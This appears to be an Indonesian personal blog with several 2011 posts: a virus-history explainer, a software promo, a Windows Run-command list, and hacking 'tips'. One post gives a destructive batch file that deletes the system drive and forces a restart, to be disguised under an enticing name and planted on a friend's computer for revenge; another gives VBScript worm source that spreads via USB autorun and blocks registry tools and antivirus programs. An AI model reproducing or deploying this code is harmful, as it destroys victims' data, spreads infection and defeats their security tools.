31 Juli 2011

Asal Usul Virus Komputer

A.ASAL MUASAL VIRUS

1949, John Von Neuman, menggungkapkan   " teori self altering automata " 
yang merupakan hasil riset dari para ahli matematika.

1960, lab BELL (AT&T), para ahli di lab BELL (AT&T)  mencoba-coba  teori 
yang diungkapkan oleh john v neuman, mereka bermain-main   dengan  teori 
tersebut untuk suatu jenis permainan/game. Para  ahli  tersebut  membuat  
program yang dapat memperbanyak dirinya dan dapat  menghancurkan program 
buatan lawan.Program yang mampu bertahan dan menghancurkan semua program 
lain,   maka akan dianggap sebagai   pemenangnya. Permainan ini akhirnya  
menjadi permainan   favorit ditiap-tiap lab komputer.semakin lama mereka 
pun sadar dan mulai mewaspadai permainan ini dikarenakan   program  yang 
diciptakan makin lama    makin    berbahaya,  sehingga  mereka melakukan 
pengawasan dan pengamanan yang ketat.

1980,  program tersebut  yang  akhirnya  dikenal dengan nama "virus" ini 
berhasil menyebar diluar lingkungan  laboratorium, dan mulai beredar  di 
dunia cyber.

1980, mulailah dikenal virus-virus yang menyebar di dunia cyber.

B.PENGERTIAN VIRUS

" A program that can infect other  programs by modifying them to  include 
a slighty altered copy of itself.A virus  can spread throughout a computer 
system or network using the authorization   of every   user using it to 
infect their programs. Every  programs that gets infected can also act as 
a virus that infection grows “ 
( Fred Cohen )

Pertama kali istilah “virus” digunakan oleh Fred Cohen pada tahun 1984 di 
Amerika Serikat. Virus komputer dinamakan “Virus” karena memiliki beberapa 
persamaan mendasar dengan virus pada istilah kedokteran(biological viruses).

Virus komputer bisa diartikan sebagai suatu program komputer biasa.Tetapi 
memiliki perbedaan yang mendasar dengan   program-program   lainnya,yaitu 
virus   dibuat   untuk  menulari  program-program  lainnya,     mengubah, 
memanipulasinya bahkan sampai merusaknya. Ada yang perlu  dicatat  disini, 
virus hanya akan menulari apabila program pemicu atau program  yang telah   
terinfeksi tadi dieksekusi, disinilah perbedaannya dengan "worm". Tulisan 
ini tidak akan bahas worm karena  nanti  akan   mengalihkan   kita   dari 
pembahasan mengenai virus ini.

C.KRITERIA VIRUS

Suatu program yang disebut virus baru dapat dikatakan adalah benar  benar 
virus apabila minimal memiliki 5 kriteria :

   1. Kemampuan suatu virus untuk mendapatkan informasi
   2. Kemampuannya untuk memeriksa suatu program
   3. Kemampuannya untuk menggandakan diri dan menularkan
   4. Kemampuannya melakukan manipulasi 
   5. Kemampuannya untuk menyembunyikan diri.

Sekarang akan coba dijelaskan dengan singkat apa yang dimaksud dari tiap
-tiap kemampuan itu dan mengapa ini sangat diperlukan.

1.Kemampuan untuk mendapatkan informasi

Pada umumnya suatu virus memerlukan daftar nama-nama file yang ada dalam 
suatu directory, untuk apa? agar dia dapat mengenali program program apa 
saja yang akan dia tulari,semisal virus makro yang akan menginfeksi semua 
file berekstensi *.doc setelah virus itu menemukannya, disinilah kemampuan 
mengumpulkan informasi itu diperlukan agar virus dapat membuat daftar/
data semua file, terus memilahnya dengan mencari file-file yang bisa 
ditulari.Biasanya data ini tercipta saat program yang tertular/terinfeksi 
atau bahkan program virus ini dieksekusi. Sang virus akan segera melakukan 
pengumpulan data dan menaruhnya di RAM (biasanya :P ) , sehingga apabila 
komputer dimatikan semua data hilang tetapi akan tercipta setiap program 
bervirus dijalankan dan biasanya dibuat sebagai hidden file oleh virus .

2.Kemampuan memeriksa suat program

Suatu virus juga harus bias untuk  memeriksa  suatu  program  yang akan 
ditulari, misalnya ia bertugas menulari program berekstensi *.doc, dia 
harus memeriksa apakah file dokumen ini telah terinfeksi ataupun belum, 
karena jika sudah maka dia akan percuma menularinya 2  kali. Ini sangat 
berguna untuk meningkatkan kemampuan  suatu virus dalam hal  kecepatan 
menginfeksi suatu file/program.Yang  umum dilakukan oleh virus  adalah 
memiliki/ memberi   tanda  pada  file/program  yang  telah   terinfeksi 
sehingga  mudah untuk dikenali  oleh  virus tersebut . Contoh penandaan 
adalah misalnya memberikan suatu byte  yang    unik  disetiap file yang 
telah terinfeksi.

3.Kemampuan untuk menggandakan diri

Kalo ini emang virus "bang-get", maksudnya tanpa ini tak adalah virus. 
Inti dari  virus adalah kemampuan mengandakan diri dengan cara menulari 
program lainnya. Suatu virus apabila telah menemukan calon   korbannya 
(baik file atau program) maka ia akan mengenalinya dengan memeriksanya, 
jika belum terinfeksi maka sang virus akan memulai aksinya untuk menulari 
dengan cara menuliskan byte pengenal pada program/   file tersebut,dan 
seterusnya mengcopikan/menulis kode objek virus diatas file/program 
yang diinfeksi.   Beberapa cara umum yang dilakukan oleh virus untuk 
menulari/ menggandakan dirinya adalah:

a.File/Program yang akan ditulari dihapus atau diubah namanya. kemudian 
diciptakan suatu file menggunakan nama itu dengan menggunakan virus 
tersebut (maksudnya virus mengganti namanya dengan nama file yang dihapus)
b.Program virus yang sudah di   eksekusi/load ke memori  akan langsung 
menulari file-file lain dengan cara menumpangi seluruh file/program 
yang ada.

4.Kemampuan mengadakan manipulasi

Rutin (routine) yang dimiliki suatu virus akan  dijalankan setelah virus 
menulari   suatu file/program. isi dari suatu rutin ini dapat  beragam 
mulai dari yang teringan  sampai pengrusakan. rutin ini umumnya digunakan  
untuk memanipulasi program ataupun mempopulerkan pembuatnya!  Rutin ini 
memanfaatkan kemampuan dari  suatu  sistem operasi (Operating System) , 
sehingga  memiliki   kemampuan   yang sama dengan  yang dimiliki sistem 
operasi. misal: 

a.Membuat gambar atau pesan pada monitor
b.Mengganti/mengubah ubah label dari tiap file,direktori,atau label dari 
  drive di pc
c.Memanipulasi program/file yang ditulari
d.Merusak program/file
e.Mengacaukan kerja printer , dsb

5.Kemampuan Menyembunyikan diri

Kemampuan Menyembunyikan diri ini harus dimiliki oleh suatu virus agar semua 
pekerjaan baik dari awal sampai berhasilnya penularan dapat terlaksana.
langkah langkah yang biasa dilakukan adalah:

-Program asli/virus disimpan dalam bentuk kode mesin dan digabung dengan  
 program lain yang dianggap berguna oleh pemakai.
-Program virus diletakkan pada Boot Record  atau   track yang jarang 
 diperhatikan oleh komputer itu sendiri
-Program virus dibuat sependek mungkin, dan hasil file yang diinfeksi tidak 
 berubah  ukurannya
-Virus tidak mengubah keterangan waktu suatu file
-dll


D.SIKLUS HIDUP VIRUS

Siklus hidup virus secara umum, melalui 4 tahap:

o Dormant phase ( Fase Istirahat/Tidur )
Pada fase ini virus tidaklah aktif. Virus akan diaktifkan oleh suatu kondisi 
tertentu, semisal:tanggal yang ditentukan,kehadiran program lain/dieksekusinya 
program lain, dsb. Tidak semua virus melalui fase ini

o Propagation phase ( Fase Penyebaran )
Pada fase ini virus akan mengkopikan dirinya kepada suatu program atau 
ke suatu tempat dari media storage (baik hardisk, ram dsb). Setiap 
program yang terinfeksi akan menjadi hasil “klonning” virus tersebut 
(tergantung cara virus tersebut menginfeksinya)

o Trigerring phase ( Fase Aktif )
Di fase ini virus tersebut akan aktif dan hal ini juga di picu oleh beberapa 
kondisi seperti pada Dormant phase 

o Execution phase ( Fase Eksekusi )
Pada Fase inilah virus yang telah aktif tadi akan melakukan fungsinya. 
Seperti menghapus file, menampilkan pesan-pesan, dsb


E.JENIS – JENIS VIRUS

Untuk lebih mempertajam pengetahuan kita tentang virus, Aku akan coba  
memberikan penjelasan tentang jenis-jenis virus yang sering berkeliaran 
di dunia cyber.

1.Virus Makro
Jenis Virus ini pasti sudah sangat sering kita dengar.Virus ini ditulis 
dengan bahasa pemrograman dari suatu aplikasi bukan dengan bahasa 
pemrograman dari suatu Operating System. Virus ini dapat berjalan apabila 
aplikasi pembentuknya dapat berjalan dengan baik, maksudnya jika pada 
komputer mac dapat menjalankan aplikasi word maka virus ini bekerja pada 
komputer bersistem operasi Mac.
contoh virus:

-variant W97M, misal W97M.Panther 
 panjang 1234 bytes,
 akanmenginfeksi NORMAL.DOT dan menginfeksi dokumen apabila dibuka.
-WM.Twno.A;TW 
 panjang 41984 bytes, 
 akan menginfeksi Dokumen Ms.Word yang menggunakan bahasa makro, biasanya 
 berekstensi *.DOT dan *.DOC
-dll

2.Virus Boot Sector
Virus Boot sector ini sudah umum sekali menyebar.Virus ini dalam menggandakan 
dirinya akan memindahkan atau menggantikan boot sector asli dengan program 
booting virus. Sehingga saat terjadi booting maka virus akan di load kememori 
dan selanjutnya virus akan mempunyai kemampuan mengendalikan hardware standar
(ex::monitor, printer dsb)  dan dari memori ini pula virus akan menyebar 
eseluruh drive yang ada dan terhubung kekomputer (ex: floopy, drive lain 
selain drive c).
contoh virus :

-varian virus wyx 
 ex: wyx.C(B) menginfeksi boot record dan floopy ; 
 panjang :520 bytes;   
 karakteristik :   memory resident dan terenkripsi)
-varian V-sign : 
 menginfeksi : Master boot record ;  
 panjang 520 bytes; 
 karakteristik: menetap di memori (memory resident),terenkripsi, dan polymorphic)
-Stoned.june   4th/ bloody!:    
 menginfeksi :  Master boot  record dan floopy; 
 panjang  520 bytes;    
 karakteristik: menetap di memori (memory resident), terenkripsi dan menampilkan 
 pesan"Bloody!june 4th 1989" setelah komputer melakukan booting sebanyak 128 kali

3.Stealth Virus 
Virus ini akan menguasai tabel tabel interupt pada DOS yang sering kita kenal  
dengan "Interrupt interceptor"  .   virus ini berkemampuan untuk mengendalikan 
instruksi instruksi level DOS dan  biasanya mereka tersembunyi sesuai namanya 
baik secara penuh ataupun ukurannya .
contoh virus:
-Yankee.XPEH.4928,    
 menginfeksi file *.COM dan *.EXE ;    
 panjang 4298 bytes; 
 karakteristik: menetap di memori, ukurantersembunyi, memiliki pemicu
-WXYC (yang termasuk kategori boot record pun  karena  masuk kategri stealth 
 dimasukkan pula disini),   menginfeksi floopy an motherboot record;   
 panjang 520 bytes;
 menetap di memori; ukuran dan virus tersembunyi.
-Vmem(s): 
 menginfeksi file file *.EXE, *.SYS, dan *.COM ;  
 panjang fie 3275 bytes; 
 karakteristik:menetap di memori, ukuran tersembunyi, di enkripsi.
-dll

4.Polymorphic Virus
Virus ini Dirancang buat mengecoh  program antivirus,artinya virus ini selalu 
berusaha agar tidak dikenali oleh antivirus dengan cara selalu merubah rubah 
strukturnya setiap kali selesai menginfeksi file/program lain.

contoh virus:

-Necropolis A/B,   
 menginfeksi file *.EXE dan *.COM;  
 panjang  file 1963  bytes; 
 karakteristik: menetap di memori, ukuran dan virus tesembunyi,terenkripsi dan 
 dapat berubah ubah struktur
-Nightfall,   
 menginfeksi file *.EXE;   
 panjang file 4554 bytes;  
 karakteristik : menetap di memori, ukuran dan virus tesembunyi,memiliki pemicu, 
 terenkripsidan dapat berubah-ubah struktur
-dll


5.Virus File/Program   
Virus ini menginfeksi file file yang dapat dieksekusi langsung dari sistem operasi, 
baik itu file application (*.EXE), maupun *.COm biasanya juga hasil infeksi 
dari virus ini dapat diketahui dengan berubahnya ukuran file yang diserangnya.


6.Multi Partition Virus
Virus ini merupakan gabungan dariVirus Boot sector dan Virus file: artinya
pekerjaan yang dilakukan berakibat dua, yaitu dia dapat menginfeksi file-
file *.EXE dan juga menginfeksi Boot Sector.



F.BEBERAPA CARA PENYEBARAN VIRUS

Virus layaknya virus biologi harus memiliki media untuk dapat menyebar,virus 
computer dapat menyebar keberbagai komputer/mesin lainnya juga melalui berbagai 
cara, diantaranya:

1.Disket, media storage R/W 
Media penyimpanan eksternal dapat menjadi sasaran empuk bagi virus untuk 
dijadikan media. Baik sebagai tempat menetap ataupun sebagai media penyebarannya. 
Media yang bias melakukan operasi R/W (read dan Write) sangat memungkinkan untuk 
ditumpangi virus dan dijadikan sebagai media penyebaran.

2.Jaringan ( LAN, WAN,dsb)
Hubungan antara beberapa computer secara langsung sangat memungkinkan suatu 
virus ikut berpindah saat terjadi pertukaran/pengeksekusian file/program 
yang mengandung virus.

3.WWW (internet)
Sangat mungkin suatu situs sengaja di tanamkan suatu ‘virus’ yang akan 
menginfeksi komputer-komputer yang mengaksesnya.

4.Software yang Freeware, Shareware atau bahkan Bajakan
Banyak sekali virus yang sengaja di tanamkan dalam suatu program yang di 
sebarluaskan baik secara gratis, atau trial version yang tentunya sudah 
tertanam virus didalamnya.

5.Attachment pada Email, transferring file
Hampir semua jenis penyebaran virus akhir-akhir ini menggunakan email attachment 
dikarenakan semua pemakai jasa internet pastilah menggunakan email untuk 
berkomunikasi, file-file ini sengaja dibuat mencolok/menarik perhatian, bahkan 
seringkali memiliki ekstensi ganda pada penamaan filenya.


G.PENANGULANGANNYA

1.Langkah-Langkah untuk Pencegahan
Untuk pencegahan anda dapat melakukan beberapa langkah-langkah berikut :
o Gunakan Antivirus yang anda percayai dengan updatean terbaru, tdak 
  perduli appun merknya asalkan selalu di update, dan nyalakan Auto protect
o Selalu men-scan semua media penyimpanan eksternal yang akan di gunakan, 
  mungkin hal ini agak merepotkan tetapi jika Autoprotect anti virus anda 
  bekerja maka prosedur ini dapat dilewatkan.
o Jika Anda terhubung langsung ke Internet cobalah untuk mengkombinasikan 
  Antivirus anda dengan Firewall, Anti spamming, dsb

2.Langkah-Lagkah Apabila telah Terinfeksi

o Deteksi dan tentukan dimanakah kira-kira sumber virus tersebut apakah disket, 
  jaringan, email dsb, jika anda terhubung ke jaringan maka ada baiknya anda 
  mengisolasi computer anda dulu (baik dengan melepas kabel atau mendisable 
  dari control panel)
o Identifikasi dan klasifikasikan jenis virus apa yang menyerang pc anda,
  dengan cara:
  - Gejala yang timbul, misal : pesan, file yang corrupt atau hilang dsb
  - Scan dengan antivirus anda, jika anda terkena saat Autoprotect berjalan 
    berarti vius definition di computer anda tidak memiliki data virus ini, 
    cobalah update secara manual atau mendownload virus definitionnya untuk 
    anda install. Jika virus tersebut memblok usaha anda untuk mengupdatenya 
    maka ,upayakan untuk menggunakan media lain (komputer) dengan antivirus 
    updatean terbaru.
o Bersihkan, setelah anda berhasil mendeteksi dan mengenalinya maka usahakan 
  segera untuk mencari removal atau cara-cara untuk memusnahkannya di situs
  -situs yang memberikan informasi perkembangan virus. Hal ini jika antivirus 
  update-an terbaru anda tidak berhasil memusnahkannya.
o Langkah terburuk, jika semua hal diatas tidak berhasil adalah memformat 
  ulang komputer anda .

PENUTUP

Semoga pembahasan mengenai Virus ini dapat memberikan manfaat khususnya 
bagi penulis yang sedang belajar dan bagi kita semua umumnya, Tulisan 
ini ditujukan untuk pembelajaran semata sehingga sangat diharapkan kritik 
dan sarannya. Apabila banyak kekurangan pada tulisan ini harap dimaklumi. 

 REFERENSI

 1.[ Stallings, William ],“CRYPTOGRAPHY AND NETWORK SECURITY,principle 
     and practice: second edition ” ,Prentice-Hall,Inc., New Jersey ,1999
 2.[ Salim, IR.Hartojo ],“Virus Komputer, teknik pembuatan & langkah-
     langkah penaggulangannya ,Andi OFFSET,Yogyakarta , 1989.
 3.[ Amperiyanto, Tri ],“Bermain-main dengan Virus Macro”,Elex Media 
      Komputindo, Jakarta,2002
 4.[ Jayakumar ], “ Viruspaperw.pdf ”, EBOOK version 
 5.[ y3dips ],“pernak pernik Virus”,http://ezine.echo.or.id,Jakarta,2003
 6.“ Virus Definition dari salah satu Antivirus ”


30 Juli 2011

Folder Lock 6.5.2 Software Penjaga Privasi File Pribadi Anda


Folder Lock - Si Software Enkripsi Tercepat! Folder Lock adalah sebuah perangkat lunak untuk mengenkripsi file dengan cara tercepat dan mengenkripsi dengan password untuk melindungi file dan folder. Anda dapat memilih untuk mengenkripsi file-file penting atau dengan kata lain mengunci file tersebut, gambar dan data pribadi anda. Folder Lock dilengkapi dengan sistim pengunci, enkripsi, stealth mode, hack upaya pemantauan, portabilitas, dukungan plug & play, membersihkan history, dan lebih dari 20 fitur privasi semua disesuaikan dengan kebutuhan khusus untuk orang yang membutuhkan privasi dan keamanan...

Folder Lock menciptakan penyimpanan dienkripsi disebut 'Lockers'. Anda dapat menyimpan sebanyak mungkin file pribadi anda & folder dalam Locker dan password yang anda lindungi dengan satu klik. Dapat mentransfer, aman dan cadangan Lockers ini. Loker yang portabel, Anda dapat menyimpan software ini dalam USB Drives, CD / DVD, & notebook atau transfer melalui email atau upload. Lockers ini adalah undeletable (tidak dapat didelete) pada komputer dimana Folder Lock terinstal.

Download Link Folder Lock 6.5.2

22 Juli 2011

Shortcut Perintah Windows

Ingin mengoperasikan komputer anda dengan cepat? Ingat perintah ini. Ini benar-benar akan menghemat banyak waktu Anda. Ada banyak perintah yang mungkin belum pernah anda lihat atau tidak tahu. Ada sifat tertentu dari windows yang anda tidak tahu ada di system.

Dibawah ini terdapat 112 perintah yang dapat dijalankan pada Aplikasi Run, dimana di sebelah kiri adalah fungsi aplikasi, dan disebelah kanan adalah fungsi perintah yang dapat anda jalankan dengan mengklik Start, Run, lalu ketik perintah kemudian klik Ok.
  1. Accessibility Controls ==>Perintah==>access.cpl
  2. Add Hardware Wizard ==>Perintah==> hdwwiz.cpl
  3. Add/Remove Programs =>Perintah==> appwiz.cpl
  4. Administrative Tools =>Perintah=> control admintools
  5. Automatic Updates==>Perintah==>wuaucpl.cpl
  6. Bluetooth Transfer Wizard==>Perintah==>fsquirt
  7. Calculator==>Perintah==>calc
  8. Certificate Manager==>Perintah==>certmgr.msc
  9. Character Map==>Perintah==>charmap
  10. Check Disk Utility==>Perintah==>chkdsk
  11. Clipboard Viewer==>Perintah==>clipbrd
  12. Command Prompt==>Perintah==>cmd
  13. Component Services==>Perintah==>dcomcnfg
  14. Computer Management==>Perintah==>compmgmt.msc
  15. Date/Time Properties==>Perintah==>timedate.cpl
  16. DDE Share==>Perintah==>ddeshare
  17. Device Manager==>Perintah==>devmgmt.msc
  18. Direct X Control Panel (If Installed)*==>Perintah==>directx.cpl
  19. Direct X Troubleshooter==>Perintah==>dxdiag
  20. Disk Cleanup Utility==>Perintah==>cleanmgr
  21. Disk Defragment==>Perintah==>dfrg.msc
  22. Disk Management==>Perintah==>diskmgmt.msc
  23. Disk Partition Manager==>Perintah==>diskpart
  24. Display Properties==>Perintah==>control desktop
  25. Display Properties==>Perintah==>desk.cpl
  26. Display Properties (w/Appearance Tab Preselected)==>Perintah==>control color
  27. Dr. Watson System Troubleshooting Utility==>Perintah==>drwtsn32
  28. Driver Verifier Utility==>Perintah==>verifier
  29. Event Viewer==>Perintah==>eventvwr.msc
  30. File Signature Verification Tool==>Perintah==>sigverif
  31. Findfast==>Perintah==>findfast.cpl
  32. Folders Properties==>Perintah==>control folders
  33. Fonts==>Perintah==>control fonts
  34. Fonts Folder==>Perintah==>fonts
  35. Free Cell Card Game==>Perintah==>freecell
  36. Game Controllers==>Perintah==>joy.cpl
  37. Group Policy Editor (XP Prof)==>Perintah==>gpedit.msc
  38. Hearts Card Game==>Perintah==>mshearts
  39. Iexpress Wizard==>Perintah==>iexpress
  40. Indexing Service==>Perintah==>ciadv.msc
  41. Internet Properties==>Perintah==>inetcpl.cpl
  42. IP Configuration (Menampilkan konfigurask koneksi)==>Perintah==>ipconfig /all
  43. IP Configuration (Menampilkan konentens DNS Cache)==>Perintah==>ipconfig /displaydns
  44. IP Configuration (Mendelete DNS konten Cache)==>Perintah==>ipconfig /flushdns
  45. IP Configuration (Pelepasan Semua Koneksi)==>Perintah==>ipconfig /release
  46. IP Configuration (Memperbaharui Semua Koneksi)==>Perintah==>ipconfig /renew
  47. IP Configuration (Refreshes DHCP & Re-Registers DNS)==>Perintah==>ipconfig /registerdns
  48. IP Configuration (Menampilkan DHCP Class ID)==>Perintah==>ipconfig /showclassid
  49. IP Configuration (Memodifikasi DHCP Class ID)==>Perintah==>ipconfig /setclassid
  50. Java Control Panel (Jika diinstall)==>Perintah==>jpicpl32.cpl
  51. Java Control Panel (Jika diinstall)==>Perintah==>javaws
  52. Keyboard Properties==>Perintah==>control keyboard
  53. Local Security Settings==>Perintah==>secpol.msc
  54. Local Users and Groups==>Perintah==>lusrmgr.msc
  55. Logs You Out Of Windows==>Perintah==>logoff
  56. Microsoft Chat==>Perintah==>winchat
  57. Minesweeper Game==>Perintah==>winmine
  58. Mouse Properties==>Perintah==>control mouse
  59. Mouse Properties==>Perintah==>main.cpl
  60. Network Connections==>Perintah==>control netconnections
  61. Network Connections==>Perintah==>ncpa.cpl
  62. Network Setup Wizard==>Perintah==>netsetup.cpl
  63. Notepad==>Perintah==>notepad
  64. Nview Desktop Manager (If Installed)==>Perintah==>nvtuicpl.cpl
  65. Object Packager==>Perintah==>packager
  66. ODBC Data Source Administrator==>Perintah==>odbccp32.cpl
  67. On Screen Keyboard==>Perintah==>osk
  68. Opens AC3 Filter (If Installed)==>Perintah==>ac3filter.cpl
  69. Password Properties==>Perintah==>password.cpl
  70. Performance Monitor==>Perintah==>perfmon
  71. Phone and Modem Options==>Perintah==>telephon.cpl
  72. Power Configuration==>Perintah==>powercfg.cpl
  73. Printers and Faxes==>Perintah==>control printers
  74. Printers Folder==>Perintah==>printers
  75. Private Character Editor==>Perintah==>eudcedit
  76. Quicktime (If Installed)==>Perintah==>QuickTime.cpl
  77. Regional Settings==>Perintah==>intl.cpl
  78. Registry Editor==>Perintah==>regedit
  79. Registry Editor==>Perintah==>regedit32
  80. Remote Desktop==>Perintah==>mstsc
  81. Removable Storage==>Perintah==>ntmsmgr.msc
  82. Removable Storage Operator Requests==>Perintah==>ntmsoprq.msc
  83. Resultant Set of Policy (XP Prof)==>Perintah==>rsop.msc
  84. Scanners and Cameras==>Perintah==>sticpl.cpl
  85. Scheduled Tasks==>Perintah==>control schedtasks
  86. Security Center==>Perintah==>wscui.cpl
  87. Services==>Perintah==>services.msc
  88. Shared Folders==>Perintah==>fsmgmt.msc
  89. Shuts Down Windows==>Perintah==>shutdown
  90. Sounds and Audio==>Perintah==>mmsys.cpl
  91. Spider Solitare Card Game==>Perintah==>spider
  92. SQL Client Configuration==>Perintah==>cliconfg
  93. System Configuration Editor==>Perintah==>sysedit
  94. System Configuration Utility==>Perintah==>msconfig
  95. System File Checker Utility (Segera scan)=>Perintah=>sfc /scannow
  96. System File Checker Utility (Pindai Sekali Pada Boot Berikutnya)  =>Perintah=>sfc /scanonce
  97. System File Checker Utility (Scan seluruh Boot)=>Perintah=>sfc /scanboot
  98. System File Checker Utility (Kembali ke setting Default)=>Perintah=>sfc /revert
  99. System File Checker Utility (Purge File Cache)==>Perintah==>sfc /purgecache
  100. System File Checker Utility (Set Cache Size untuk ukuran x)==>Perintah==>sfc /cachesize=x
  101. System Properties==>Perintah==>sysdm.cpl
  102. Task Manager==>Perintah==>taskmgr
  103. Telnet Client==>Perintah==>telnet
  104. User Account Management==>Perintah==>nusrmgr.cpl
  105. Utility Manager==>Perintah==>utilman
  106. Windows Firewall==>Perintah==>firewall.cpl
  107. Windows Magnifier==>Perintah==>magnify
  108. Windows Management Infrastructure==>Perintah==>wmimgmt.msc
  109. Windows System Security Tool==>Perintah==>syskey
  110. Windows Update Launches==>Perintah==>wupdmgr
  111. Windows XP Tour Wizard==>Perintah==>tourstart
  112. Wordpad==>Perintah==>write
Creator: DunovSR
Original: http://www.dunovteck.tk
Email: DunovSR@binushacker.org
Forum: http://forum.binushacker.net

16 Juli 2011

Script Pengrusak Komponen Windows

oke.... kita mulai aja pembahasannya...
pertama-tama gue mau nanya dulu ya??
pertanyaan gue simple aja:

1. pernah kamu di kerjain sama temanmu sendiri?
misalnya mengambil data dari komputermu secara diam2?
atau memasukan virus trojan hours ke dalam komputermu??
hiii... jengkelin ya?? trus komputer kita bisa di intip dari jauh klo terhubung dengan internet

2. kamu masih sakit hati ga sama dia?? klo masih aku punya teknik untuk memuaskan amarahmu ke dia.
caranya :

1.buka aplikasi notepad.exe
2. copy paste code di bawah ini

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

3. save as dengan nama apa aja...!! terserah kamu yang penting ber'extensi [*.bat]

contohnya : setelah code di atas di copy paste trus kamu save as dengan pilihan file
(all) berikan nama file tersebut misalnya : {cewe sexy}=cewe sexy.bat trus save...

file yang sudah jadi itu iconya mirip2 command pront pada windows. nah file yang bakalan buat dia menderita?? ... hahahaha soalnya harus install ulang windowsnya sudah jadi. tinggal kamu masukin filenya ke komputer target]. biarin dia terkecoh membuka file tadi...dan dalam waktu kurang dari 2 menit komputernya akan restart dan mengkonfirmasikan bahwa terjadi corrupt pada system komponen windows dan harus di install ulang...

tapi terserah kamu...sih mending jangan deh kasian tuh target klo dia ga bisa nginstall windows gimana donk?? hahaha
ini sebenarnya hanya buat pembelajaran betapa rentanya system operasi windows

hanya dengan symbol yang jumlahnya ga nyampe 100 bisa merusak organ penting di dalamnya.... Ga percaya?? coba aja....!!!

Cara Membobol File Rar Dan Zip

Pernakah kamu mendownload file besar, seperti contohnya game berexstensi rar dan ternyata disitu meminta untuk memasukan password ? pasti jengkel sekali !!
tenang saja password tersebut bisa kita buka.
dengan aplikasi RarCrack kita bisa mebobolnya / membukanya.

Biasanya di internet memang ditawarkan download software pembuka zip,rar,7Zip yang terkunci, namun kita wajib mengeluarkan biaya, paling tidak mereka hanya menawarkan program trial yang ada expire datenya. Tetapi jika kamu adalah pengguna Linux (kalau kamu tidak punya Linux, silahkan file tersebut bawa kepada teman kamu yang mempunyai OS Linux dan ekstrak di komputernya, kemudian transfer file-file tersebut ke USB dan bawa pulang.

RarCrack adalah solusi yang bagus sebagai cara membuka file zip,rar,7zip yang terproteksi password.
Utility kecil yang bernama RarCrack dijalankan dengan command line.

silahkan didownload disini atau http://sourceforge.net/projects/rarcrack/ secara gratis atau freeware. Dengan metode brute-force algoritma, RarCrack dapat dengan cerdas membongkar sandi rahasia file rar, atau zip yang terkunci.

Cara menggunakannya :

RarCracknya dijalan terlebih dahulu.. Kemudian Drag (pindahkan)File Zip, Rar, 7Zip yang di pasword ke dalam RarCrack..
selesai . . .

@ingat
aplikasi ini hanya dapat bekerja di linux saja.

Sumber : http://agus-goes-syeber.blogspot.com

Script Virus

Kali ini saya akan membagi script virus, script ini boleh anda sebarluaskan, bahkan anda jalankan. Tapi dengan tujuan untuk pembelajaran semata.

Kedewasan sikap anda sangat dibutuhkan, segala resiko yang dihasilkan oleh virus ini, diluar tanggung jawab saya.

Sekali lagi, gunakan script ini hanya untuk tujuan pembelajaran. Bukan untuk merusak, bila anda ingin melihat kemampuannya, silahkan aktifkan di komputer anda sendiri. Jangan di komputer orang lain. Saya tidak bertanggung jawab atas kerusakan yang di buat oleh virus ini.

Pertama-tama buka notepad, kemudian copas (copy-paste) script di bawah ini kedalam notepad, kemudian simpan dengan format vhck3d.vbs dimulai dari on error resume next

-------------------------script begin--------------------------

On error resume next
Dim dini,jatiya,i,loph,you,mf,isi,tf,vhck3d,nt,check,sd

'Siapkan isi autorun atau bahasa kerennya make the autorun

Isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe vhck3d.vbs"
Set you = createobject("scripting.filesystemobject")
Set mf = you.getfile(wscript.scriptfullname)
Dim text,size
Size = mf.size
Check = mf.drive.drivetype
Set text = mf.openastextstream(1,-2)
Do while not text.atendofstream
Dini = dini & text.readline
Dini = dini & vbcrlf
Loop
Do

'Buat file induk bahasa coolnya prepare the mother

Set i = you.getspecialfolder(0)
Set jatiya = you.getspecialfolder(1)
Set tf = you.getfile(jatiya & "\hck3d.vbs")
Tf.attributes = 32
Set tf = you.createtextfile(jatiya & "\hck3d.vbs",2,true)
Tf.write dini
Tf.close
Set tf = you.getfile(jatiya & "\hck3d.vbs")
Tf.attributes = 39

'Sebar ke removable disc ditambahkan dengan autorun.inf ini saya mah gak tau bahasa inggrisnya

For each loph in you.drives
If (loph.drivetype = 1 or loph.drivetype = 2) and loph.path <> "a:" then
Set tf=you.getfile(loph.path &"\vhck3d.sys.vbs")
Tf.attributes =32
Set tf=you.createtextfile(loph.path &"\vhck3d.vbs",2,true)
Tf.write dini
Tf.close
Set tf=you.getfile(loph.path &"\vhck3d.vbs")
Tf.attributes = 39
Set tf =you.getfile(loph.path &"\autorun.inf")
Tf.attributes = 32
Set tf=you.createtextfile(loph.path &"\autorun.inf",2,true)
Tf.write isi
Tf.close
Set tf = you.getfile(loph.path &"\autorun.inf")
Tf.attributes=39
End if
Next

'Manipulasi registry
Set vhck3d = createobject("wscript.shell")

'Banyak yang dirubah..liat ndiri deh aaah

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\msconfig.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\regedit.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\regedt32.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\registryeditor.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\setup.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\avscan.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\avcenter.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\ashavast.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\ansav.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\viremoval.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\viremover.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\pcmav-cln.exe.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows\currentversion\winlogon\legalnoticecaption", "my loph dini"

Vhck3d.regwrite "hkey_local_machine\software\policies\microsoft\windows\installer\limitsystemrestorecheckpointing", "1", "reg_dword"

Vhck3d.regwrite "hkey_local_machine\software\policies\microsoft\windows\installer\disablemsi", "1", "reg_dword"

